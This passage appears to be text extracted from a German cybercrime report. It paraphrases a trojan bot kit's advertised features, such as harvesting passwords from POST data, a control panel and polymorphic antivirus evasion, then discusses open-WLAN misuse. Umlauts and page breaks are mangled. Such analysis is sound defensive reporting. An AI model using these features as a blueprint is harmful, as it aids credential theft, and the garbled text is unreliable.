Viren infiziert andere mit betr gerischer Absicht hergestellt und von Com puter Kriminellen als neuen Vektor verwendet um Malware zu verbreiten Ein
113. w nschten POST Angaben hervorgehoben sind erm glicht zum Beispiel auf der Webseite http rambler ru nur Logs und Kennwort her auszuholen wobei bei der Suche alle brigen Daten weggelassen werden 9 Speicherung von Logs in verschl sselten Dateien in der Struktur von Verzeichnissen Bot net Land ID des Computers 10 Erteilung von Befehlen an die Bots auch Filter m glich 11 Wenn Sie ber PHP Kenntnisse verf gen k nnen Sie das Steuerungs Panel selbst nach Ihrem Geschmack umgestalten NOS 3 Der Builder Interessant ist vor allem Punkt 5 bei welchem die Entwickler auf eine polymorphe Ver schl sselung hinweisen die jedes Mal eine neue Version des Trojaners erstellt und den Bot damit f r Antivirenprogramme schwer erkennbar macht 1 In VC 8 0 geschrieben ohne Verwendung von RTL usw in reiner WinAPI wodurch ein kleiner Umfang erreicht wird h ngt von der Zusammenstellung ab bei Zusammenstellung mit Log Decoder betr gt der Umfang mehr als 400 kb da eine L nderdatenbank nach IP Nummern eingeschlossen wird 2 Status bersicht des laufenden Systems um den Bot zu testen k nnen Sie ihn auf Ihrem eigenen Computer starten und ihn dann per Tastendruck l schen Log Decoder mit Gliederung nach L ndern Builder f r die Konfigurationsdatei verschl sselt und den Bot selbst Polymorphe Verschl sselung BETA Befindet sich derzeit im Test Stadium und garantiert keinen hundertprozentigen Schutz gegen Antiv
114. z glich Sicherheit in den letzten Jahren stetig In einem Bericht der Schweizer Monatszeitschrift IT Security wurden 474 Funknetzwerke untersucht 11 davon waren ffentliche Hotspots 22 un verschl sselt sowie 67 verschl sselt Diese nicht repr sentativen Zahlen sind das Ergebnis eines Feldversuches in der Stadt Z rich Sie decken sich auch mit neueren Tests in Deutschland welche nur bei jedem f nften respektive sechsten Funknetzwerk eine unge n gende Sicherheitseinstellung feststellten Andere Tests hingegen stellten den Nutzern ein wesentlich schlechteres Zeugnis aus Es d rfte auf alle F lle unumstritten sein dass immer noch zu viele Funknetzwerke nicht oder nur unzureichend gesch tzt sind insbeson dere wenn man die stetige Zunahme von verzeichneten Missbr uchen bedenkt So stellen m gliche Zugriffe auf das interne Netzwerk und das Mitschneiden des Netzverkverkehrs eine Gefahr dar siehe Kapitel 3 1 An dieser Stelle soll jedoch das Benutzen von offenen Funknetzwerken zur Verschleierung der Urheberschaft bei IT Straftaten thematisiert werden Der Koordinationsstelle zur Be k mpfung der Internetkriminalit t KOBIK sind verschiedene F lle bekannt bei denen ein offenes WLAN benutzt wurde um eine Straftat zu begehen Es handelt sich hierbei um Er pressungen sexuelle N tigung sowie den Download von Kinderpornographie Sicherheits technisch gesehen sind solche Netze demzufolge mit einem beachtlichen Risikop
Download Pdf Manuals
Related Search